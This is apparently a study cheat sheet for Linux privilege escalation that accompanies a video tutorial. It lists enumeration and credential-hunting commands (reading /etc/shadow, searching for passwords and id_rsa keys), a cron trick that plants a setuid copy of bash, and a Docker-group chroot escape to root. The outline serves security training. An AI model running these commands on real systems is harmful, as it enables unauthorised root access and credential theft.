Linux Privilege Escalation

相关视频：https://www.bilibili.com/video/BV1paNfzPErh/?spm_id_from=333.1387.homepage.video_card.click

Enumeration

    - System Enumeration

        hostname

        uname -a

        cat /proc/version

        cat /etc/issue

        lscpu

        ps -aux

    - User Enumeration

        whoami

        id

        sudo -l

        cat /etc/passwd

        cat /etc/shadow

        cat /etc/group

        history

        sudo su -

    - Network Enumeration

        ifconfig

        ip a

        ip route

        route

        arp -a

        ip neigh

        netstat -ano

    - Password Hunting

        grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2> /dev/null

        locate password | more

        find / -name id_rsa 2> /dev/null

Kernel-Exploit

    - Dirty Cow

    - PwnKit

Passwords&File-Permissions

    - Weak File Permissions  

    - SSH Keys

        find / -name authorized_keys 2> /dev/null

        find / -name id_rsa 2> /dev/null

Sudo

    - VIM

    - awk

    - apache2

    - nano

    - LD_PRELOAD

SUID

    - find / -perm -u=s -type f 2>/dev/null  // https://gtfobins.github.io/#+suid

    - find / -type f -perm -0400 -ls 2>/dev/null

Capabilities

    - getcap -r / 2>/dev/null    // cap_setuid+ep

Scheduled-Tasks

    - cat /etc/crontab           // PayloadsAllTheThings

    - cp /bin/bash /tmp/bash;chmod +s /tmp/bash

    - WildCards

    - OverWrites

    - OverView

NFS-Root-Squashing

    - cat /etc/exports

Docker

    - Docker Group  // docker run -v /:/mnt --rm --it bash chroot /mnt sh